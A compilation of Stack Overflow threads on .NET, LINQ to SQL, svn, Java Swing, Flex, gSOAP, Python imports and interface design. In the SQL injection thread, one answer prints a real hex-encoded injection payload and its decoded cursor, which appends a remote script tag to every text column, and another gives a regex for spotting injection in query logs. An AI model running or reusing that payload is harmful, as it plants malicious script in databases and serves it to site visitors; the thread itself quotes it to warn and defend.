*The contract for IDisposable.Dispose indicates that it must be safe to call multiple times (calling Dispose on an object that was already disposed should do nothing)
*It can get very complicated to properly manage an inheritance hierarchy of disposable objects, especially if different layers introduce new Disposable and unmanaged resources. In the pattern above Dispose(bool) is virtual to allow it to be overridden so that it can be managed, but I find it to be error-prone.
In my opinion, it is much better to completely avoid having any types that directly contain both disposable references and native resources that may require finalization. SafeHandles provide a very clean way of doing this by encapsulating native resources into disposable that internally provide their own finalization (along with a number of other benefits like removing the window during P/Invoke where a native handle could be lost due to an asynchronous exception).
Simply defining a SafeHandle makes this Trivial:
private class SomeSafeHandle
: SafeHandleZeroOrMinusOneIsInvalid {
public SomeSafeHandle()
: base(true)
{ }
protected override bool ReleaseHandle()
{ return NativeMethods.CloseHandle(handle); }
}
Allows you to simplify the containing type to:
class SomeObject : IDisposable {
SomeSafeHandle _SomeSafeHandle;
FileStream _SomeFileStream;
// Something useful here
public virtual void Dispose() {
_SomeSafeHandle.Dispose();
_SomeFileStream.Dispose();
}
}
A: The GC will not call dispose. It may call your finalizer, but even this isn't guaranteed under all circumstances.
See this article for a discussion of the best way to handle this.
A: The .Net Garbage Collector calls the Object.Finalize method of an object on garbage collection. By default this does nothing and must be overidden if you want to free additional resources.
Dispose is NOT automatically called and must be explicity called if resources are to be released, such as within a 'using' or 'try finally' block
see http://msdn.microsoft.com/en-us/library/system.object.finalize.aspx for more information
A: No, it's not called.
But this makes easy to don't forget to dispose your objects. Just use the using keyword.
I did the following test for this:
class Program
{
static void Main(string[] args)
{
Foo foo = new Foo();
foo = null;
Console.WriteLine("foo is null");
GC.Collect();
Console.WriteLine("GC Called");
Console.ReadLine();
}
}
class Foo : IDisposable
{
public void Dispose()
{
Console.WriteLine("Disposed!");
}
A: The documentation on IDisposable gives a pretty clear and detailed explaination of the behavior, as well as example code. The GC will NOT call the Dispose() method on the interface, but it will call the finalizer for your object.
A: The IDisposable pattern was created primarily to be called by the developer, if you have an object that implements IDispose the developer should either implement the using keyword around the context of the object or call the Dispose method directly.
The fail safe for the pattern is to implement the finalizer calling the Dispose() method. If you don't do that you may create some memory leaks i.e.: If you create some COM wrapper and never call the System.Runtime.Interop.Marshall.ReleaseComObject(comObject) (which would be placed in the Dispose method).
There is no magic in the clr to call Dispose methods automatically other than tracking objects that contain finalizers and storing them in the Finalizer table by the GC and calling them when some clean up heuristics kick in by the GC.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45036",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "145"
} |
Q: How do you retrieve the commit message and file list for a particular revision? I need to deploy a few files that were checked in sometime ago (can't remember the exact ones), so I'm looking to get a list so I can deploy just those files. What is the svn command to do this?
A: @Dana & @John
Actually, svn log -v -r <#> http://my.svn.server/repository-root will work and show you all modified files within this repository. Or if you wanted this to work from within a working copy, you could use the output of svn info | grep Repository Root or something to find the actual repository root.
--verbose is the same as -v, and those options simply list all of the affected files.
A: svn log has a --verbose parameter. I don't have a repository here to test with, but does that return a list of modified files?
You can also use svn diff -r <revision> to retrieve the full change details, which you can parse or read manually to find out which files were changed.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45042",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: What can I do to resolve a "Row not found or changed" Exception in LINQ to SQL on a SQL Server Compact Edition Database? When executing SubmitChanges to the DataContext after updating a couple properties with a LINQ to SQL connection (against SQL Server Compact Edition) I get a "Row not found or changed." ChangeConflictException.
var ctx = new Data.MobileServerDataDataContext(Common.DatabasePath);
var deviceSessionRecord = ctx.Sessions.First(sess => sess.SessionRecId == args.DeviceSessionId);
deviceSessionRecord.IsActive = false;
deviceSessionRecord.Disconnected = DateTime.Now;
ctx.SubmitChanges();
The query generates the following SQL:
UPDATE [Sessions]
SET [Is_Active] = @p0, [Disconnected] = @p1
WHERE 0 = 1
-- @p0: Input Boolean (Size = 0; Prec = 0; Scale = 0) [False]
-- @p1: Input DateTime (Size = 0; Prec = 0; Scale = 0) [9/4/2008 5:12:02 PM]
-- Context: SqlProvider(SqlCE) Model: AttributedMetaModel Build: 3.5.21022.8
The obvious problem is the WHERE 0=1, After the record was loaded, I've confirmed that all the properties in the "deviceSessionRecord" are correct to include the primary key. Also when catching the "ChangeConflictException" there is no additional information about why this failed. I've also confirmed that this exception get's thrown with exactly one record in the database (the record I'm attempting to update)
What's strange is that I have a very similar update statement in a different section of code and it generates the following SQL and does indeed update my SQL Server Compact Edition database.
UPDATE [Sessions]
SET [Is_Active] = @p4, [Disconnected] = @p5
WHERE ([Session_RecId] = @p0) AND ([App_RecId] = @p1) AND ([Is_Active] = 1) AND ([Established] = @p2) AND ([Disconnected] IS NULL) AND ([Member_Id] IS NULL) AND ([Company_Id] IS NULL) AND ([Site] IS NULL) AND (NOT ([Is_Device] = 1)) AND ([Machine_Name] = @p3)
-- @p0: Input Guid (Size = 0; Prec = 0; Scale = 0) [0fbbee53-cf4c-4643-9045-e0a284ad131b]
-- @p1: Input Guid (Size = 0; Prec = 0; Scale = 0) [7a174954-dd18-406e-833d-8da650207d3d]
-- @p2: Input DateTime (Size = 0; Prec = 0; Scale = 0) [9/4/2008 5:20:50 PM]
-- @p3: Input String (Size = 0; Prec = 0; Scale = 0) [CWMOBILEDEV]
-- @p4: Input Boolean (Size = 0; Prec = 0; Scale = 0) [False]
-- @p5: Input DateTime (Size = 0; Prec = 0; Scale = 0) [9/4/2008 5:20:52 PM]
-- Context: SqlProvider(SqlCE) Model: AttributedMetaModel Build: 3.5.21022.8
I have confirmed that the proper primary fields values have been identified in both the Database Schema and the DBML that generates the LINQ classes.
I guess this is almost a two part question:
*
*Why is the exception being thrown?
*After reviewing the second set of generated SQL, it seems like for detecting conflicts it would be nice to check all the fields, but I imagine this would be fairly inefficient. Is this the way this always works? Is there a setting to just check the primary key?
I've been fighting with this for the past two hours so any help would be appreciated.
A: I fixed this by adding (UpdateCheck = UpdateCheck.Never) to all [Column] definitions.
Does not feel like an appropriate solution, though. In my case it seems to be related to the fact that this table has an association to another table from where a row is deleted.
This is on Windows Phone 7.5.
A: This is what you need to override this error on C# code:
try
{
_db.SubmitChanges(ConflictMode.ContinueOnConflict);
}
catch (ChangeConflictException e)
{
foreach (ObjectChangeConflict occ in _db.ChangeConflicts)
{
occ.Resolve(RefreshMode.KeepChanges);
}
}
A: I don't know if you've found any satisfactory answers to your question, but I posted a similar question and eventually answered it myself. It turned out that the NOCOUNT default connection option was turned on for the database, which caused a ChangeConflictException for every update made with Linq to Sql. You can refer to my post at here.
A: First, it useful to know, what is causing the problem. Googling solution should help, you can log the details (table, column, old value, new value) about the conflict to find better solution for solving the conflict later:
public class ChangeConflictExceptionWithDetails : ChangeConflictException
{
public ChangeConflictExceptionWithDetails(ChangeConflictException inner, DataContext context)
: base(inner.Message + " " + GetChangeConflictExceptionDetailString(context))
{
}
/// <summary>
/// Code from following link
/// https://ittecture.wordpress.com/2008/10/17/tip-of-the-day-3/
/// </summary>
/// <param name="context"></param>
/// <returns></returns>
static string GetChangeConflictExceptionDetailString(DataContext context)
{
StringBuilder sb = new StringBuilder();
foreach (ObjectChangeConflict changeConflict in context.ChangeConflicts)
{
System.Data.Linq.Mapping.MetaTable metatable = context.Mapping.GetTable(changeConflict.Object.GetType());
sb.AppendFormat("Table name: {0}", metatable.TableName);
sb.AppendLine();
foreach (MemberChangeConflict col in changeConflict.MemberConflicts)
{
sb.AppendFormat("Column name : {0}", col.Member.Name);
sb.AppendLine();
sb.AppendFormat("Original value : {0}", col.OriginalValue.ToString());
sb.AppendLine();
sb.AppendFormat("Current value : {0}", col.CurrentValue.ToString());
sb.AppendLine();
sb.AppendFormat("Database value : {0}", col.DatabaseValue.ToString());
sb.AppendLine();
sb.AppendLine();
}
}
return sb.ToString();
}
}
Create helper for wrapping your sumbitChanges:
public static class DataContextExtensions
{
public static void SubmitChangesWithDetailException(this DataContext dataContext)
{
try
{
dataContext.SubmitChanges();
}
catch (ChangeConflictException ex)
{
throw new ChangeConflictExceptionWithDetails(ex, dataContext);
}
}
}
And then call submit changes code:
Datamodel.SubmitChangesWithDetailException();
Finally, log the exception in your global exception handler:
protected void Application_Error(object sender, EventArgs e)
{
Exception ex = Server.GetLastError();
//TODO
}
A: Thats nasty, but simple:
Check if the data types for all fields in the O/R-Designer match the data types in your SQL table.
Double check for nullable! A column should be either nullable in both the O/R-Designer and SQL, or not nullable in both.
For example, a NVARCHAR column "title" is marked as NULLable in your database, and contains the value NULL. Even though the column is marked as NOT NULLable in your O/R-Mapping, LINQ will load it successfully and set the column-String to null.
*
*Now you change something and call
SubmitChanges().
*LINQ will generate a SQL query
containing "WHERE [title] IS NULL", to make sure the title has not been changed by someone else.
*LINQ looks up the properties of
[title] in the mapping.
*LINQ will find [title] NOT NULLable.
*Since [title] is NOT NULLable, by
logic it never could be NULL!
*So, optimizing the query, LINQ
replaces it with "where 0 = 1", the
SQL equivalent of "never".
The same symptom will appear when the data types of a field does not match the data type in SQL, or if fields are missing, since LINQ will not be able to make sure the SQL data has not changed since reading the data.
A: There is a method on DataContext called Refresh which may help here. It allows you to reload the database record before changes are submitted, and offers different modes to determine which values to keep. "KeepChanges" seems the smartest for my purposes, it is intended to merge my changes with any non-conflicting change that happened in the database in the meantime.
If I understand it correctly. :)
A: This can also be caused by using more than one DbContext.
So for example:
protected async Task loginUser(string username)
{
using(var db = new Db())
{
var user = await db.Users
.SingleAsync(u => u.Username == username);
user.LastLogin = DateTime.UtcNow;
await db.SaveChangesAsync();
}
}
protected async Task doSomething(object obj)
{
string username = "joe";
using(var db = new Db())
{
var user = await db.Users
.SingleAsync(u => u.Username == username);
if (DateTime.UtcNow - user.LastLogin >
new TimeSpan(0, 30, 0)
)
loginUser(username);
user.Something = obj;
await db.SaveChangesAsync();
}
}
This code will fail from time to time, in ways that seem unpredictable, because the user is used in both contexts, changed and saved in one, then saved in the other. The in-memory representation of the user who owns "Something" doesn't match what's in the database, and so you get this lurking bug.
One way to prevent this is to write any code that might ever be called as a library method in such a way that it takes an optional DbContext:
protected async Task loginUser(string username, Db _db = null)
{
await EFHelper.Using(_db, async db =>
{
var user = await db.Users...
... // Rest of loginUser code goes here
});
}
public class EFHelper
{
public static async Task Using<T>(T db, Func<T, Task> action)
where T : DbContext, new()
{
if (db == null)
{
using (db = new T())
{
await action(db);
}
}
else
{
await action(db);
}
}
}
So now your method takes an optional database, and if there isn't one, goes and makes one itself. If there is it just reuses what was passed in. The helper method makes it easy to reuse this pattern across your app.
A: I solved this error by redragging over a table from the server explorer to the designer and re-building.
A: In my case, the error was raised when two users having different LINQ-to-SQL data contexts updated the same entity in the same way. When the second user attempted the update, the copy they had in their data context was stale even though it was read after the first update had completed.
I discovered the explanation and solution in this article by Akshay Phadke: https://www.c-sharpcorner.com/article/overview-of-concurrency-in-linq-to-sql/
Here's the code I mostly lifted:
try
{
this.DC.SubmitChanges();
}
catch (ChangeConflictException)
{
this.DC.ChangeConflicts.ResolveAll(RefreshMode.OverwriteCurrentValues);
foreach (ObjectChangeConflict objectChangeConflict in this.DC.ChangeConflicts)
{
foreach (MemberChangeConflict memberChangeConflict in objectChangeConflict.MemberConflicts)
{
Debug.WriteLine("Property Name = " + memberChangeConflict.Member.Name);
Debug.WriteLine("Current Value = " + memberChangeConflict.CurrentValue.ToString());
Debug.WriteLine("Original Value = " + memberChangeConflict.OriginalValue.ToString());
Debug.WriteLine("Database Value = " + memberChangeConflict.DatabaseValue.ToString());
}
}
this.DC.SubmitChanges();
this.DC.Refresh(RefreshMode.OverwriteCurrentValues, att);
}
When I looked at my output window while debugging, I could see that the Current Value matched the Database Value. The "Original Value" was always the culprit. That was the value read by the data context before applying the update.
Thanks to MarceloBarbosa for the inspiration.
A: I know this question has long since been answered but here I have spent the last few hours banging my head against a wall and I just wanted to share my solution which turned out not to be related to any of the items in this thread:
Caching!
The select() part of my data object was using caching. When it came to updating the object a Row Not Found Or Changed error was cropping up.
Several of the answers did mention using different DataContext's and in retrospect this is probably what was happening but it didn't instantly lead me to think caching so hopefully this will help somebody!
A: I recently encountered this error, and found the problem was not with my Data Context, but with an update statement firing inside a trigger after Commit was being called on the Context.
The trigger was trying to update a non-nullable field with a null value, and it was causing the context to error out with the message mentioned above.
I'm adding this answer solely to help others dealing with this error and not finding a resolution in the answers above.
A: I have also got this error because of using two different contexts. I resolved this issue by using single data context.
A: In my case the problem was with the server-wide user options.
Following:
https://msdn.microsoft.com/en-us/library/ms190763.aspx
I enabled the NOCOUNT option in hope to get some performance benefits:
EXEC sys.sp_configure 'user options', 512;
RECONFIGURE;
and this turns out to break Linq's checks for the Affected Rows (as much as I can figure it out from .NET sources), leading to ChangeConflictException
Resetting the options to exclude the 512 bit fixed the problem.
A: After employing qub1n's answer, I found that the issue for me was that I had inadvertently declared a database column to be decimal(18,0). I was assigning a decimal value, but the database was changing it, stripping the decimal portion. This resulted in the row changed issue.
Just adding this if anyone else runs into a similar issue.
A: I know this is an older post, but the issue can still be problematic today. I wanted to share my experience with this; as the solution for me was slightly different than the accepted answer. The accepted answer however did lead me to resolve my issue so thank you!
In my case, I had an update trigger that would auto-insert a row into a status history table anytime the status changed on a row in a table (SQL Server); based on a set of known codes. My history table had a NOT NULL attribute for the status ID column, and my INSERT statement didn't take into account that a previously unknown code might slip through; thereby causing the row to insert to fail.
So the moral of the story is in addition to checking your data models, be sure to review any triggers you have defined as that too will result in a "row not found or changed" error.
Hope this helps someone else down the line; thanks all!
A: I had the same problem when inserting data and then wanting to modify or delete them in the same form, the solution I found to this was the following:
db.Refresh(System.Data.Linq.RefreshMode.KeepChanges, employee);
db = is your connection variable as you might imagine, and employee would be the variable you would be using for your table.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45045",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "103"
} |
Q: LINQ to SQL Association - "Properties do not have matching types" I am trying to link two fields of a given table to the same field in another table.
I have done this before so I can't work out what is wrong this time.
Anyway:
Table1
- Id (Primary)
- FK-Table2a (Nullable, foreign key relationship in DB to Table2.Id)
- FK-Table2b (Nullable, foreign key relationship in DB to Table2.Id)
Table2
- Id (Primary)
The association works for FK-Table2a but not FK-Table2b.
In fact, when I load into LINQ to SQL, it shows Table2.Id as associated to Table1.Id.
If I try and change this, or add a new association for FK-Table2b to Table2.Id it says: "Properties do not have matching types".
This also works in other projects - maybe I should just copy over the .dbml?
Any ideas?
A: I see this problem when I try to create one-to-one relationships where one side of the relationship is nullable (so really, one-to-zero/one). LINQ-to-SQL doesn't seem to support this so it appears we are forced to a plural relationship and a collection that will contain zero or one items. Annoying.
A: No idea on the cause, but I just reconstructed my .dbml from scratch and it fixed itself.
Oh for a "refresh" feature...
A: I had the same problem. This error appeared when I tried to link different types of fields, or when I tryied to drag-and-drop table to .dbml space, but .dbml already had contained linked tables with different types of linked fields.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45062",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Java: Flash a window to grab user's attention Is there a better way to flash a window in Java than this:
public static void flashWindow(JFrame frame) throws InterruptedException {
int sleepTime = 50;
frame.setVisible(false);
Thread.sleep(sleepTime);
frame.setVisible(true);
Thread.sleep(sleepTime);
frame.setVisible(false);
Thread.sleep(sleepTime);
frame.setVisible(true);
Thread.sleep(sleepTime);
frame.setVisible(false);
Thread.sleep(sleepTime);
frame.setVisible(true);
}
I know that this code is scary...But it works alright. (I should implement a loop...)
A: There are two common ways to do this: use JNI to set urgency hints on the taskbar's window, and create a notification icon/message. I prefer the second way, since it's cross-platform and less annoying.
See documentation on the TrayIcon class, particularly the displayMessage() method.
The following links may be of interest:
*
*New System Tray Functionality in Java SE 6
*Java Programming - Iconified window blinking
*TrayIcon for earlier versions of Java
A: Well, there are a few minor improvements we could make. ;)
I would use a Timer to make sure callers don't have to wait for the method to return. And preventing more than one flashing operation at a time on a given window would be nice too.
import java.util.Map;
import java.util.Timer;
import java.util.TimerTask;
import java.util.concurrent.ConcurrentHashMap;
import javax.swing.JFrame;
public class WindowFlasher {
private final Timer timer = new Timer();
private final Map<JFrame, TimerTask> flashing
= new ConcurrentHashMap<JFrame, TimerTask>();
public void flashWindow(final JFrame window,
final long period,
final int blinks) {
TimerTask newTask = new TimerTask() {
private int remaining = blinks * 2;
@Override
public void run() {
if (remaining-- > 0)
window.setVisible(!window.isVisible());
else {
window.setVisible(true);
cancel();
}
}
@Override
public boolean cancel() {
flashing.remove(this);
return super.cancel();
}
};
TimerTask oldTask = flashing.put(window, newTask);
// if the window is already flashing, cancel the old task
if (oldTask != null)
oldTask.cancel();
timer.schedule(newTask, 0, period);
}
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45075",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Flex and .NET - What's a good way to get data into Flex, WebORB? Web Services? Ok, I asked a question earlier about Flex and ADO.NET Data Services but didn't get much response so I thought I'd rephrase. Does anyone have any experience building Adobe Flex applications with a .NET back-end? If so, what architecture did you use and what third-party tools if any did you employ. I've read a little about doing Flex remoting with WebORB but it seems more complicated than it should be, are web services an adequate alternative?
A: I believe web services is actually more complicated and more restrictive. You cannot create stateful web services, data exchange is fairly slow due to verboseness of XML. Developing with WebORB is not that hard. It basically boils down to developing an assembly and deploying it into the /bin folder of a weborb-enabled ASP.NET application. Once you do that you can invoke your .NET classes using Flex's RemoteObject API. For instance:
var ro:RemoteObject = new RemoteObject( "GenericDestination" );
ro.source = "com.bar.FooService"
ro.foo.addEventListener( ResultEvent.RESULT, gotFooResult );
ro.foo();
public function gotFooResult( evt:ResultEvent ):void
{
// evt.result contains the return value;
}
It is important to compile your Flex builder project with the -service compiler argument. You can add in the Flex Builder's "Flex compiler" project properties:
-services c:/Inetpub/wwwroot/weborb30/web-inf/flex/services-config.xml
If you point to that path, then make sure to deploy your DLL into:
c:/Inetpub/wwwroot/weborb30/bin
A: I've mainly used plain ASP.NET pages that return XML for situations that are mainly one-way (data from ASP.NET --> Flex/Flash) communication. The Flex side just uses a URLLoader to hit the ASP.NET page and loads the result as XML.
If the communication needs to be a little more two-sided (sending more than a couple parameters to ASP.NET lets say), I have used standard ASP.NET webservices.
I've never used WebOrb or Flex remoting because I've never really needed that type of interaction between the server and the SWF.
Hope that helps.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45078",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Connect C++ app to JAVA web app with SOAP I have a C++ app that needs to connect to a JAVA web app, are there any good, open source SOAP packages for this, or would it be easier to just roll my own?
A: I'll vote up darkhelmet since gSoap would also be my recommendation. We're mostly a Java shop but with some C++ bits and gSoap has been our preferred SOAP integration way. It is indeed more work than your typical Java stacks but it seems solid.
A: A quick Google turned up this for a toolkit. While I have never used it, it seems to be quite popular and solid. Not exactly a package, and not really rolling your own, but sort of in the middle.
A: We went with gSOAP rather than Axis to avoid having a dependency on both a JRE and Axis just for building a C++ project. It's worked ok, which is good since the gSOAP code is horrible and makes it very daunting to fix any bugs in it.
A warning about gSOAP linking though: you can never use more than one WSDL in a single link object (executable, dll, shared object). This is because some of the generated WSDL-specific functions have general names (e.g. soap_getfault()).
Worse, with Unix ELF linking, these names will cause cross-linking between shared objects, so a FooService fault might be processed by the soap_getfault() for BarService, corrupting memory if the fault detail structures are different.
The workaround for that is to make sure that nothing gSOAP-related is exposed outside the SO they are linked into. This can be solved by giving gcc these definitions _both when linking the gSOAP library itself and linking your code:
#define SOAP_FMAC2 __attribute__ ((visibility ("hidden")))
#define SOAP_FMAC4 __attribute__ ((visibility ("hidden")))
#define SOAP_FMAC6 __attribute__ ((visibility ("hidden")))
#define SOAP_NMAC __attribute__ ((visibility ("hidden")))
I solved it by putting them into a header file and forcing gcc to include that before anything else with -include fixsoaplink.h.
A better way if you can take the effort might to change the default ELF visibility to hidden, and only export the symbols you want to (like dllimport/dllexport in VC).
A: Take a look at Apache's Axis project. It's well supported on C++ (and Java) and if you have the good fortune to start with a good WSDL for the target service you'll be home-free.
A: When I saw the generated code from gSOAP, I about had a heart attack.
The fact that the user is required to do all of the memory management for each object just boggled my mind. So, I sat down and did something probably stupid in the long term, but fairly satisfying in the short term...
I wrote a program that wraps the gSOAP code with my own CPP classes that make the interface look more like I'd like it to look.
I used Scoped Guards within each service method to hold onto memory, and since I'm dealing with all sorts of different types, I used a std::list<boost::any> to do it. I have functions that make each object type that I need, and they put the actual memory into my list<any>. It's had a few problems - mostly just configuration changes. I'm generating thousands of classes now, talking to dozens of web services.
I'm not sure I'd recommend my same path to anyone else... I should probably bite the bullet and start trying to contribute to gSOAP, rather than maintain my own tool which is dependent on the output of gSOAP...
A: Here's another issue with gSOAP we just discovered the hard way: it uses select() for all polling, so once you've got 1024 file descriptors open (64 on Windows?) it will trash the stack. That results in either spurious errors where it is unable to send messages, to complete crashes of the application.
The workaround, unless you're prepared to patch gSOAP itself, is to write your own network code and hook it in with soap->fconnect, ->fsend, ->frecv etc.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45086",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: RegEx to Detect SQL Injection Is there a Regular Expression that can detect SQL in a string? Does anyone have a sample of something that they have used before to share?
A: Don't do it. You're practically guaranteed to fail. Use PreparedStatement (or its equivalent) instead.
A: Save yourself problems and use stored procedures with prepared statements or parameterized queries. Stored procedures are good practice anyway, as they act like an interface to the database, so you can change what happens behind the scenes (inside the stored proc) but the signature remains the same. The prepared statements help take care of injection protection.
A: Use stored procedures or prepared statements. How will you detect something like this?
BTW do NOT run this:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415 245204054205641524348415228323535292C40432056415243
4841522832353529204445434C415245205461626C655 F437572736F7220435552534F5220464F522053454C45435420612E6 E616D652C622E6E616D652046524F4D207379736F626A65637473206 12C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747 970653D3939204F5220622E78747970653D3335204F5220622E78747 970653D323331204F5220622E78747970653D31363729204F50454E2 05461626C655F437572736F72204645544348204E4558542046524F4 D205461626C655F437572736F7220494E544F2040542C40432057484 94C4528404046455443485F5354415455533D302920424547494E204 55845432827555044415445205B272B40542B275D20534554205B272 B40432B275D3D525452494D28434F4E5645525428564152434841522 834303030292C5B272B40432B275D29292B27273C736372697074207 372633D687474703A2F2F7777772E63686B626E722E636F6D2F622E6 A733E3C2F7363726970743E27272729204645544348204E455854204 6524F4D205461626C655F437572736F7220494E544F2040542C40432 0454E4420434C4F5345205461626C655F437572736F72204445414C4 C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);
Which translates to:
( DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC(
'UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=chkbnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor )
A: I don't have a regex but my understanding is that the most important thing is to detect the single quote. All the injection attacks start from there. They probably have the -- in there too to comment out and other SQL that might be after the string.
A: As said, it is better to use prepared statements. You could argue forcing key queries to be executed by a stored procedure to force the use of preparing the call.
Anyway, here is a simple grep to detect classic n=n integer in where clauses; it skips flagging the 1=1 used by many lazy query constructors for the AND, but will flag it for the OR
((WHERE|OR)[ ]+[\(]*[ ]*([\(]*[0-9]+[\)]*)[ ]*=[ ]*[\)]*[ ]*\3)|AND[ ]+[\(]*[ ]*([\(]*1[0-9]+|[2-9][0-9]*[\)]*)[ ]*[\(]*[ ]*=[ ]*[\)]*[ ]*\4
It could of course be improved to detect decimal and string comparisons, but it was a quick detection mechanism, along with other greps such as ORD(MID(, etc.
Use it on a query log, such as mysql's general log
Hope its useful
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45093",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: How do I know if Javascript has been turned off inside browser? I assume that you can't use a JavaScript code snippet to validate if the browser user has turned off JavaScript. So what can I use instead? Can someone offer a code sample?
I'm looking to wrap an if/then statement around it.
I often code in CFML, if that helps.
A: this is a total hack but you could use an iframe inside the noscript tag to trigger an HTTP GET on a url to tell the server that a user doesn't have javascript enabled.
<body>
...
...
<noscript>
<iframe src ="/nojs.aspx?SOMEIDENTIFIER=XXXX&NOJS=TRUE" style="display: none;">
</iframe>
</noscript>
...
...
</body>
A: Use the <noscript> HTML tags.
A: Not sure what you are trying to do but if you just need to inform the user that Javascript is required you can just use the '<noscript>' tag. If you need to know on the server you could make an Ajax style request to the server from javascript. If you get the request javascript is working otherwise its not.
A: Are we talking about something like this:
JavaScript:
<body>
...
...
<script type="text/javascript">
<!--
document.write("Hello World!")
//-->
</script>
<noscript>Your browser does not support JavaScript!</noscript>
...
...
</body>
A: He's asking for a check to see if javascript is enabled.
I can only think of doing exactly what the OP said - try using some Javascript with an interval to send a callback if JS is activated - unfortunately I don't think you can check server side whether JS is enabled which is why you use tags rather than render different content from the server.
A: If you use Unobtrusive JavaScript then you don't need to check whether the user has JavaScript enabled.
If they have got JavaScript enabled then they'll get the full effect, but if they haven't then users will still be able to use your site. And as well as being better for accessibility you might find this approach boosts your SEO.
A: <noscript>
...some non-js code
</noscript>
A: Yes that NoScript snippet is right.
A: You might have javascript execute some AJAX query and check to see if it has. Those that download the page and don't execute the query either have JS disabled or they're robots.
A: Really all you can do is put some message in the tags. I seem to remember trying this on ASP.NET somewhere, but you can really only tell if the browser supports Javascript, not whether or not it is actually allowed/enabled.
A: I don't know much about CFML, but .NET has the ability to detect browser capabilities. It does not, however, have the ability to detect if the browser is capable of javascript, but has it turned off. So, you're stuck there too.
Besides the HTML noscript tag, there's not much you can do, as far as I know, besides writing javascript progressively (see progressive enhancement) so that you don't need to check for Javascript:off.
A: I don't know JS, but would it be possible to modify the links inside the page with JS? If someone goes to the unmodified link, they're not using JS, but if they do then they are using JS. Does this make any sense?
A: Have never worked out how to do it without a round trip, so it depends on what your goal is.
If they have to have javascript to proceed, then I have (in .net) done things like disabling the login button at the server side, then enabled it client side it with javascript, and used a noscript tag to show an error message.
If it has to work either way, you can use progressive enhancement, and / or use js to set a hidden field and then set a session variable, but this means that you don't know until they get to the second request.
A: you could write
<script type="text/javascript" language="javascript">document.write("<input type='hidden' name='hasJs' value='1' />");
or otherwise write a cookie via js and then read it at the server if you want to check server side for js.
A: if you are looking for a way to check it server side, you're can send the user a js that puts a cookie.... if the cookie exist on a a request then you can tell if the scripted worked or not!
A: One reliable way to do this is using javascript's $.post to send a note to your server. (Apologies if there's any errors in this, written off top of my head, will update later when I get around to testing). Should allow you to build it so you can even pull from session data if they're using javascript, which will allow you to serve up replacements for javascript without having to resort to .
Your on-page script:
<script>
function myJavascriptTest(){
$.post ()('myJavascriptTest.php', {myJavascriptOn: true}, function(){
return true;
}
myJavascriptTest()
</script>
And in the targeted .php...
<?php
if ($_POST['myJavascriptOn'] == true){
$_SESSION['javascriptIsOn'] = true;
} else {
$_SESSION['javascriptIsOn'] = false;
}
?>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45097",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: Python packages - import by class, not file Say I have the following file structure:
app/
app.py
controllers/
__init__.py
project.py
plugin.py
If app/controllers/project.py defines a class Project, app.py would import it like this:
from app.controllers.project import Project
I'd like to just be able to do:
from app.controllers import Project
How would this be done?
A: You need to put
from project import Project
in controllers/__init__.py.
Note that when Absolute imports become the default (Python 2.7?), you will want to add a dot before the module name (to avoid collisions with a top-level model named project), i.e.,
from .project import Project
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45122",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "58"
} |
Q: Interfaces and Versioning I am designing a new System and I have a lot of Interfaces that will grow over time with the system. What is the best practice to name this interfaces
ISomethingV01
ISomethingV02
etc
and I do this
public interface ISomething{
void method();
}
then I have to add method 2 so now what I do?
public interface ISomethingV2:ISomething{
void method2();
}
or same other way?
A: I think you're overrusing interfaces.
Meyer and Martin told us: "Open for extension but closed for modification!"
and then Cwalina (et al) reiterated:
From Framework Design Guidelines...
In general, classes are the preferred
construct for exposing abstractions.
The main drawback of interfaces is
that they are much less flexible than
classes when it comes to allowing for
evolution of APIs. Once you ship an
interface, the set of its members is
fixed forever. Any additions to the
interface would break existing types
implementing the interface.
A class offers much more flexibility.
You can add members to classes that
have already shipped. As long as the
method is not abstract (i.e., as long
as you provide a default
implementation of the method), any
existing derived classes continue to
function unchanged.
A: Ideally, you shouldn't be changing your interfaces very often (if at all). If you do need to change an interface, you should reconsider its purpose and see if the original name still applies to it.
If you still feel that the interfaces will change, and the interfaces changes are small (adding items) and you have control of the whole code base, then you should just modify the interface and fix all the compilation errors.
If your change is a change in how the interface is to be used, then you need to create a separate interface (most likely with a different name) to support that alternative usage pattern.
Even if you end up creating ISomething, ISomething2 and ISomething3, the consumers of your interfaces will have a hard time figuring out what the differences are between the interfaces. When should they use ISomething2 and when should they use ISomething3? Then you have to go about the process of obsoleting ISomething and ISomething2.
